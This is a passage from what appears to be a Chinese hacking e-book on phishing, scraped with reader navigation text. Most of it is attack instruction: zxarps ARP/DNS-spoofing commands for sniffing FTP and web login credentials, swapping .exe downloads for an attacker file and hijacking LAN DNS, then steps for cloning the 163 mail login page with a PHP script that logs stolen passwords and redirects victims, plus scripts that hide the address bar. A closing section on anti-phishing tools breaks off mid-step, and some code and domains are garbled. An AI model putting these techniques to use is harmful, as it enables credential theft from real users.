按键盘上方向键 ← 或 → 可快速上下翻页,按键盘上的 Enter 键可回到本书目录页,按键盘上方向键 ↑ 可回到本页顶部!
————未阅读完?加入书签已便下次继续阅读!
则这一行记录是不生效的。建议大家遵循这样的习惯:IP地址+空格+域名+Enter键。
7。4。2内网中的DNS劫持
DNS是由解析器和域名服务器组成的。域名服务器是指保存有该网络中所有主机的域名和对应IP地址,并具有将域名转换为IP地址功能的服务器。其中域名必须对应一个IP地址,而IP地址不一定有域名。
在Inter上域名与IP地址之间是一对一(或者多对一)的,域名虽然便于人们记忆,但机器之间只能互相认识IP地址,它们之间的转换工作称为域名解析,域名解析需要由专门的域名解析服务器来完成,DNS就是进行域名解析的服务器。DNS命名用于Inter等TCP/IP网络中,通过用户友好的名称查找计算机和服务。
当用户在应用程序中输入DNS名称时,DNS服务可以将此名称解析为与之相关的其他信息,如IP地址。因为,你在上网时输入的网址,是通过域名解析系统解析找到了相对应的IP地址,这样才能上网。其实,域名的最终指向是IP。
DNS欺骗劫持工具有很多,这里用zxarps。exe来演示内网的劫持,使内网中任一用户打开网站。hackbase。都会被劫持到本机。先在CMD命令行下运行命令“zxarps。exe”,即可显示出该命令的各个参数,其含义如下:
Options(参数说明):
…idx'index'网卡索引号
…ip'ip'欺骗的IP;用'…'指定范围;';'隔开
…sethost'ip'默认是网关;可以指定别的IP
…port'port'关注的端口;用'…'指定范围;';'隔开;没指定默认关注所有端口
…reset恢复目标机的ARP表
…hostname探测主机时获取主机名信息
…logfilter'string'设置保存数据的条件,必须+…_做前缀;后跟关键字;
';'隔开关键字;多个条件'|'隔开
所有带+前缀的关键字都出现的包则写入文件
带…前缀的关键字出现的包不写入文件
带_前缀的关键字一个符合则写入文件(如有+…条件也要符合)
…save_a'filename'将捕捉到的数据写入文件ACSII模式
…save_h'filename'HEX模式
…hacksite'ip'指定要插入代码的站点域名或IP;
多个可用';'隔开;没指定则影响所有站点
…insert'htmlcode'指定要插入html代码
…postfix'string'关注的后缀名,只关注HTTP/1。1302
…hackURL'url'发现关注的后缀名后修改URL到新的URL
…filename'name'新URL上有效的资源文件名
…hackdns'string'DNS欺骗,只修改UDP的报文;多个可用';'隔开
格式:域名|IP,。aa。|222。22。2。2;。bb。|1。1。1。1
…Interval'ms'定时欺骗的时间间隔,单位:毫秒:默认是3000ms
…spoofmode'1|2|3'将数据骗发到本机;欺骗对象:1为网关;2为目标机;3为两者(默认)
…speed'kb'限制指定的IP或IP段的网络总带宽;单位:KB
example(参数说明):
嗅探指定的IP段中端口80的数据,并以HEX模式写入文件
zxarps。exe…idx0…ip192。168。0。2…192。168。0。50…port80…save_hsniff。log
FTP嗅探;在21或2121端口中出现USER或PASS的数据包记录到文件
zxarps。exe…idx0…ip192。168。0。2…port21;2121…spoofmode2…logfilter〃_USER;_PASS〃…save_asniff。log
HTTPweb邮箱登陆或一些论坛登陆的嗅探;根据情况自行改关键字
zxarps。exe…idx0…ip192。168。0。2…192。168。0。50…port80…logfilter〃+POST;+user;+pass〃…save_asniff。log
用|添加嗅探条件;这样FTP和HTTP的一些敏感关键字可以一起嗅探
zxarps。exe…idx0…ip192。168。0。2…port80;21…logfilter〃+POST;+user;+pass|_USER;_PASS〃…save_asniff。log
如果嗅探到目标下载文件后缀是exe等则更改Location:为//xx。/test。exe
zxarps。exe…idx0…ip192。168。0。2…192。168。0。12;192。168。0。20…192。168。0。30…spoofmode3…postfix〃。exe;。rar;。zip〃…hackurl//xx。/…filenametest。exe
指定的IP段中的用户访问到…hacksite中的网址则只显示justforfun
zxarps。exe…idx0…ip192。168。0。2…192。168。0。99…port80…hacksite222。2。2。2;。a。;。b。…insert〃justforfun〃
指定的IP段中的用户访问的所有网站都插入一个框架代码
zxarps。exe…idx0…ip192。168。0。2…192。168。0。99…port80…insert〃〃
指定的两个IP的总带宽限制到20KB
zxarps。exe…idx0…ip192。168。0。55;192。168。0。66…speed20
DNS欺骗
zxarps。exe…idx0…ip192。168。0。55;192。168。0。66…hackdns
〃。aa。|222。22。2。2;。bb。|1。1。1。1〃
再以本机在内网中的IP地址192。168。0。10为例,在CMD命令行下运行DNS劫持的命令:
zxarps。exe–idx0–ip192。168。0。1…192。168。0。255…hackdns。hackbase。|192。168。0。10
在命令执行成功后,命令行中将显示结果。
接下来需要在本机架设一个WEB服务器,以便将内网中的DNS劫持过来。
第五章 其他网络钓鱼艺术
除了上面介绍的几种网络钓鱼技术外,还有一些钓鱼技术可以让用户更快地了解钓鱼攻击。
如利用“网站整站下载器”工具将网站的相关文件下载到本地,然后将下载的文件上传到FTP空间中,最后再对网页的内容稍加修改,即可伪造出一个与真实网站一模一样的伪冒网站。
7。5。1将163邮箱整站扒下来
攻击者为了保证钓的鱼更多、更有质量,其设定的钓鱼对象是访问量过高的站点及金融交易站点。本节将以163邮箱为例,介绍攻击者如何伪造整个网站,且让人看不出任何破绽。
为了使伪造的网站达到逼真的程度,需要将真实网站的素材下载下来,并将它们改造处理。一般会直接使用IE浏览器来将门户网站文件下载到本地,但这种做法经常会出现错误,因此,这里将介绍一个工具:网站整站下载器。
网站整站下载器可以分析网页中的所有链接(图片链接、脚本与样式表链接等),包括源码以及所有页面,并将网站的内部链接文件下载、分类,也就是说它是一个可以将整个网站下载下来的软件。
下面介绍使用“网站整站下载器”。电子书站文件的方法。
步骤01下载并安装“网站整站下载器TeleportPro…v1。61”,即可进入主窗口中。单击主窗口中工具栏上的【NewProjectwizard】(新计划项目向导)按钮,在弹出的【NewProjectwizard】(新计划项目向导)对话框中对新建的项目进行设置。
【提示】
如果是第一次运行TeleportPro软件,程序会自动出现【NewProjectwizard】(新计划项目向导)对话框,这个向导对话框中的各选项实际是TeleportPro主要功能的体现。
步骤02在对话框中保持默认设置不变,单击【下一步】按钮,即可弹出【StartingAddress】(起始地址)对话框。在地址栏中必须输入要下载的网站文件的地址,否则将被警告无法进入下一步,这里将要下载“//mail。163。”网站。
步骤03单击【下一步】按钮,在弹出的【ProjectConfiguration】(项目设置)对话框中可选择接收指定网站的文件类型,包括文本、图形和声音等,可根据要求选定,这里选择“Everything”(任何文件类型)单选按钮。对于必须持有账号和密码才能进入的网站,必须在下面的“Account”和“Password”文本框中输入正确的账号和密码,否则TeleportPro无法进入此站点下载文件。
步骤04单击【下一步】按钮,在弹出的【Congratulations】(祝贺)对话框中单击【完成】按钮,即可完成新项目向导的创建。
步骤05此时,程序会弹出【SaveAs】(另存为)对话框,在“文件名”文本框中键入后缀为。tpp的项目名,单击【保存】按钮后,即可返回TeleportPro主窗口中。
步骤06在TeleportPro主窗口中单击工具栏上的【Star】(开始)按钮,或选择【Project】→【Start】菜单项,即可开始文件下载操作。
步骤07稍等一会儿后,当“//mail。163。”网站文件下载完毕后,即可将下载的网站文件上传到FTP空间中。
再将其对比一下后,即可发现上传到空间中的虚假163邮箱网站和真实的163邮箱网站一模一样,但地址栏中的地址却不相同。
7。5。2继续完善,让伪造生效
将163邮箱网站整站下载下来后,需要将网页中的内容稍作修改,以免用户打开伪冒网站时出现破绽。
1。修改代码中的外部链接地址
由于使用网站整站下载器下载下来的网站,对于外部的链接它全部都换成了一段脚本代码:javascript:if(confirm…)。用户需要将这段脚本代码去掉,并替换成原来的链接地址。如果没有图片显示,可以手动下载到本地后再修改链接。
2.修改index。html文件中的代码
用记事本打开下载的163邮箱网站首页文件index。html,再将下面这段验证脚本删除:
varati=user。value。indexOf(〃@〃);
if(ati!=…1){
user。value=user。value。substring(0;ati);
}
varsecure=fm。remUser。checked?true:false;
varurl=fm。secure。checked?〃https://reg。163。/logins。jsp〃:〃//reg。163。/login。jsp〃;
url+=〃?type=1&url=//entry。mail。163。/coremail/fcg/ntesdoor2?〃;
url+=〃lightweight%3D1%26verifycookie%3D1%26〃;
if(secure){
user。autoplete=〃on〃;
}else{
user。autoplete=〃off〃;
}
fGetVersion(fm);
fm。action=url+〃language%3D…1%26style%3D〃+fm。style。value;
visitordata。setVals('fm。username。value;fm。style。value;fm。secure。checked?1:0';true);
visitordata。store();
再将index。html中的代码:
替换成如下代码:
脚本文件checklogin。php的功能是取得用户输入的用户名与密码信息,然后写入到db。文本文件中。代码修改完后,将文件上传到劫持PHP的空间中,并打开该空间网页,在登录信息中输入用户名和密码,即可看到返回的网页为空白网页,但其实用户输入的登录信息已经保存了。
在其中输入登录信息后,返回的空白网页会让一些用户产生怀疑,为使伪造网站更加真实,可以打开checklogin。php文件,在文件内容的最后一行“?》”前插入一行重定向到163网站的代码:header(〃Location://mail。163。〃);。
这一句代码的功能是告诉浏览器如何处理这个页面,这样,当用户访问并提交表单后,即可跳转到真实的163邮箱网站了。'Zei8。Com电子书下载:。 '
7。5。3强势的伪冒钓鱼站点
钓鱼攻击真正的目的是窃取用户的信息,从攻击者的角度来看,有效率的获取信息才是王者之道,这个“道”中就有“强势”。当一种攻击并不强势时,不会获取到期望的效果,因此,钓鱼攻击必需要强调强势。
先来了解下早期的弹出窗口实现方式。攻击者会先给用户一个链接地址,假设攻击者将这个“弹出窗口演示”的网页链接放置在一个邮件中,其中引向弹出窗口的页面为pop。html,其作用为载入钓鱼网站并弹出登录窗口,代码如下:
弹出窗口演示
if(window!=top)
{
top。location=window。location;
}
代码中的“CONTENT=0”表示在重定向到网页“//。hackbase。/”(这里假设为钓鱼站点)等待时间为0秒,且调用了弹出窗口“login。html”网页。
该网页中的代码如下:
黑客网站
用户名:
密 码:
代码中的“01300000294030122844403414774。jpg”为弹出窗口中显示的图片。单击钓鱼链接时,“pop。html”页面定向于网站“//。hackbase。/”,并调用了弹出窗口“login。html”。对于没有上网经验的用户来说,一般情况下容易被弹出窗口误导。
这种方式的弹出窗口虽然也能够误导没有上网经验的用户,但对于经常上网的用户来说,其缺陷非常明显。多数的浏览器与工具条都可以通过设置来禁止这种自动性的弹出窗口。
另外,还有一种将网址隐藏的方式就是对网页窗口全屏化,使用户无法看到网址,但这种方式同样也有缺陷,会让用户起疑心。
比较保险的做法是使用加强式script劫持函数来达到网页全屏的效果,其脚本代码如下:
全屏窗口
functionmy_function()
{
vartargeturl=〃//。hackbase。/〃
newwin=window。open(〃〃;〃〃;〃noscrollbars〃)
if(document。all)
{
newwin。moveTo(0;0)
newwin。resizeTo(screen。width。screen。height)
}
newwin。location=targeturl
}
第六章 网络钓鱼防范工具
网络钓鱼攻击从防范的角度来说可以分为两个方面,一个方面是对钓鱼攻击利用的资源进行限制,一般钓鱼攻击所利用的资源是可控的,如WEB漏洞是Web服务提供商可以直接修补的、邮件服务商可以使用域名反向解析邮件发送服务器提醒用户是否收到匿名邮件。
另外一个方面是不可控制的行为,如浏览器漏洞,用户必须打上补丁防御攻击者直接使用客户端软件漏洞发起的钓鱼攻击,各个安全软件厂商也可提供修补客户端软件漏洞的功能。
同时,各大网站有义务保护所有用户的隐私,有义务提醒所有的用户防止钓鱼,提高用户的安全意识,从两个方面积极防御钓鱼攻击。
下面将介绍几种能够防范网络钓鱼的工具。
1.360安全卫士
最新版本的360安全卫士中内置了360网盾,它是一款免费好用的全功能的上网保护软件,能够全面防范用户上网过程中可能遇到的各种风险,里面自带的防范网络钓鱼功能可以有效检测并拦截假冒的银行、彩票和购物等欺诈网站。
360网盾中的防范网络钓鱼功能的使用方法如下:
步骤01安装并运行“360安全卫士7。3”,即可进入其主窗口中,单击主窗口上方的“网盾”按钮。
步骤02此时,即可弹出【360网盾】窗口,在“上网保护”选项卡下的网盾监控列表中单击“拦截欺诈网站,网购不受骗”后的“开启”按钮,即可打开钓鱼、欺诈网站拦截功能。
步骤03在打开钓鱼、欺诈网站拦截功能后,当用户浏览到钓鱼网站时,系统会自动拦截访问的网站,避免被其攻击。另外,用户还可以在【360网盾】窗口中的“拦截历史”选项卡下查看360网盾拦截的网页威胁记录。
步骤04单击【360网盾】窗口右上方的按钮,在其下拉列表中选择“设置”选项,可打【360网盾…设置】对话框。在“基本设置”选项卡中可设置是否提示拦截到的网页、是否开启URL云查询功能、是否自动上传可疑代码到360安全中心,在设置完成后单击【确定】按钮即可。
步骤05在【360网盾…设置】对话框中选择“已拦截网站”选项卡,在文本框中输入要拦截的网站,如//hao123。,单击“设为拦截”按钮,即可将该网站添加到“已拦截网站列表”中。
步骤06将要拦截的网站添加到“已拦截网站列表”中后,当用户访问到钓鱼网站或列表中的站点时,会自动弹出拦截提示访问页面,阻止用户继续访问危险站点。
2.IE7。0
IE7。0浏览器开始加入反钓鱼功能,这个功能成为浏览器安全功能的一个选项…仿冒网站筛选器。当我们访问一个网站时,反钓鱼检测机制便开始自动工作,验证网站的真实性。
下面介绍使用IE7。0浏览器防范网络钓鱼的方法。
步骤01打开IE7。0浏览器,选择【工具】→【Inter选项】菜单项,即可打开【Inter选项】对话框。在其中选择“高级”选项卡,在“设置”列表框中的“安全”选项区域中选择“仿冒网站